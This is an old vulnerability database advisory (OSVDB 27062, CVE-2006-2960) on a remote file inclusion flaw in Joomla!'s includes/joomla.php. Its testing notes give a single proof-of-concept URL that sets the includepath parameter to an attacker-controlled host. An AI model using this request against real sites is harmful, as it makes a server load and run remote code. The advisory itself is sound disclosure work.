Joomla! /includes/joonla.php includepath Variable Remote File Inclusion

2006-06-10T18:26:37
ID OSVDB:27062
Type osvdb
Reporter OSVDB
Modified 2006-06-10T18:26:37

Description

Manual Testing Notes

http://[target]/[path_to_Joomla!]/includes/joomla.php?includepath=[attacker]

References:

Security Tracker: 1016269 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0150.html CVE-2006-2960 Bugtraq ID: 18363